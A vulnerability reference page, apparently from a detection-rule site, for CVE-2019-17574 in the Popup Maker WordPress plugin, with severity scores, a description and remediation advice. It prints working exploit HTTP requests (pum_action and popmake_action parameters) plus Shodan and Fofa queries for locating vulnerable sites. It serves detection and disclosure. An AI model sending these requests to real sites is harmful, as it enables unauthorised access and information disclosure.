🔙 목록으로 돌아가기

CVE-2019-17574: Popup-Maker < 1.8.12 - Broken Authentication

TitlePopup-Maker < 1.8.12 - Broken Authentication
AuthorDhiyaneshDK
SeverityCritical
ImpactUnauthenticated attackers can gain administrative access to the WordPress site.
RemediationUpdate Popup-Maker plugin to version 1.8.12 or later.
CVSS Score9.1
EPSS Score0.86894
CVE IDCVE-2019-17574
CWE IDCWE-639
Shodan Queryhttp.html:/wp-content/plugins/popup-maker/
Fofa Querybody=/wp-content/plugins/popup-maker/
Tags cve cve2019 wpscan wp wordpress wp-plugin disclosure popup-maker auth-bypass code-atlantic vkev vuln

🔍 Vulnerability Description

An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the “support debug text file”).

🌐 HTTP Request

GET /?pum_action=tools_page_tab_system_info HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

popmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17574.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17574.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A